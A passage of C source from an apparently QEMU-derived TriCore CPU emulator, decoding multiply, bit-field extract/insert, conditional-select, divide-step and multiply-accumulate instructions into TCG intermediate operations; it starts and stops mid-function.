tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULR_H_16_LL: GEN_HELPER_LL(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RR1_MULR_H_16_LU: GEN_HELPER_LU(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RR1_MULR_H_16_UL: GEN_HELPER_UL(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RR1_MULR_H_16_UU: GEN_HELPER_UU(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, n); } static void decode_rr1_mulq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; uint32_t n; TCGv temp, temp2; r1 = MASK_OP_RR1_S1(ctx->opcode); r2 = MASK_OP_RR1_S2(ctx->opcode); r3 = MASK_OP_RR1_D(ctx->opcode); n = MASK_OP_RR1_N(ctx->opcode); op2 = MASK_OP_RR1_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RR1_MUL_Q_32: gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RR1_MUL_Q_64: CHECK_REG_PAIR(r3); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 0); break; case OPC2_32_RR1_MUL_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RR1_MUL_Q_64_L: CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n, 0); break; case OPC2_32_RR1_MUL_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RR1_MUL_Q_64_U: CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n, 0); break; case OPC2_32_RR1_MUL_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_mul_q_16(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RR1_MUL_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_mul_q_16(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RR1_MULR_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_mulr_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RR1_MULR_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_mulr_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* RR2 format */ static void decode_rr2_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; 
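/* RR2 format: plain 32x32 multiplies. The 64-bit variants (MUL_64, MUL_U_64) write their result into the even/odd data register pair D[r3]/D[r3+1], hence the CHECK_REG_PAIR calls below. */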
uint32_t op2; int r1, r2, r3; op2 = MASK_OP_RR2_OP2(ctx->opcode); r1 = MASK_OP_RR2_S1(ctx->opcode); r2 = MASK_OP_RR2_S2(ctx->opcode); r3 = MASK_OP_RR2_D(ctx->opcode); switch (op2) { case OPC2_32_RR2_MUL_32: gen_mul_i32s(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MUL_64: CHECK_REG_PAIR(r3); gen_mul_i64s(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MULS_32: gen_helper_mul_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MUL_U_64: CHECK_REG_PAIR(r3); gen_mul_i64u(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MULS_U_32: gen_helper_mul_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRPW format */ static void decode_rrpw_extract_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int32_t pos, width; TCGv temp; op2 = MASK_OP_RRPW_OP2(ctx->opcode); r1 = MASK_OP_RRPW_S1(ctx->opcode); r2 = MASK_OP_RRPW_S2(ctx->opcode); r3 = MASK_OP_RRPW_D(ctx->opcode); pos = MASK_OP_RRPW_POS(ctx->opcode); width = MASK_OP_RRPW_WIDTH(ctx->opcode); switch (op2) { case OPC2_32_RRPW_EXTR: if (width == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], 0); break; } if (pos + width <= 32) { /* optimize special cases */ if ((pos == 0) && (width == 8)) { tcg_gen_ext8s_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); } else if ((pos == 0) && (width == 16)) { tcg_gen_ext16s_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); } else { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 32 - pos - width); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], 32 - width); } } break; case OPC2_32_RRPW_EXTR_U: if (width == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], 0); } else { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], pos); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], ~0u >> (32-width)); } break; case OPC2_32_RRPW_IMASK: CHECK_REG_PAIR(r3); if (pos + width <= 32) { temp = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, temp, ((1u << width) - 1) << pos); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2], pos); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], temp); tcg_temp_free(tcg_ctx, temp); } break; case OPC2_32_RRPW_INSERT: if (pos + width <= 32) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos, width); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRR format */ static void decode_rrr_cond_select(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; TCGv temp; op2 = MASK_OP_RRR_OP2(ctx->opcode); r1 = MASK_OP_RRR_S1(ctx->opcode); r2 = MASK_OP_RRR_S2(ctx->opcode); r3 = MASK_OP_RRR_S3(ctx->opcode); r4 = MASK_OP_RRR_D(ctx->opcode); switch (op2) { case OPC2_32_RRR_CADD: gen_cond_add(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_CADDN: gen_cond_add(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_CSUB: 
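/* CSUB: D[r4] = (D[r3] != 0) ? D[r1] - D[r2] : D[r1]; CSUBN below is the same with the condition inverted. */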
gen_cond_sub(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_CSUBN: gen_cond_sub(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_SEL: temp = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_RRR_SELN: temp = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); tcg_temp_free(tcg_ctx, temp); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr_divide(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; op2 = MASK_OP_RRR_OP2(ctx->opcode); r1 = MASK_OP_RRR_S1(ctx->opcode); r2 = MASK_OP_RRR_S2(ctx->opcode); r3 = MASK_OP_RRR_S3(ctx->opcode); r4 = MASK_OP_RRR_D(ctx->opcode); switch (op2) { case OPC2_32_RRR_DVADJ: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, dvadj, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_DVSTEP: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, dvstep, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_DVSTEP_U: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, dvstep_u, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMAX: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmax, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMAX_U: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmax_u, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMIN: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmin, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMIN_U: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmin_u, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_PACK: CHECK_REG_PAIR(r3); gen_helper_pack(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_PSW_C, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RRR_ADD_F: gen_helper_fadd(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_SUB_F: gen_helper_fsub(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_MADD_F: gen_helper_fmadd(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_MSUB_F: gen_helper_fmsub(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], 
tcg_ctx->cpu_gpr_d[r3]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRR2 format */ static void decode_rrr2_madd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4; op2 = MASK_OP_RRR2_OP2(ctx->opcode); r1 = MASK_OP_RRR2_S1(ctx->opcode); r2 = MASK_OP_RRR2_S2(ctx->opcode); r3 = MASK_OP_RRR2_S3(ctx->opcode); r4 = MASK_OP_RRR2_D(ctx->opcode); switch (op2) { case OPC2_32_RRR2_MADD_32: gen_madd32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADD_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_32: gen_helper_madd32_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADD_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddu64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_U_32: gen_helper_madd32_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr2_msub(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4; op2 = MASK_OP_RRR2_OP2(ctx->opcode); r1 = MASK_OP_RRR2_S1(ctx->opcode); r2 = MASK_OP_RRR2_S2(ctx->opcode); r3 = MASK_OP_RRR2_S3(ctx->opcode); r4 = MASK_OP_RRR2_D(ctx->opcode); switch (op2) { case OPC2_32_RRR2_MSUB_32: gen_msub32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUB_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_32: gen_helper_msub32_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUB_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubu64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_U_32: gen_helper_msub32_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_U_64: CHECK_REG_PAIR(r4);
CHECK_REG_PAIR(r3); gen_msubsu_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRR1 format */ static void decode_rrr1_madd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MADD_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADD_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADD_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADD_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDM_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDM_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDM_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDM_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], 
tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDMS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDMS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDMS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDMS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDR_H_LL: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case 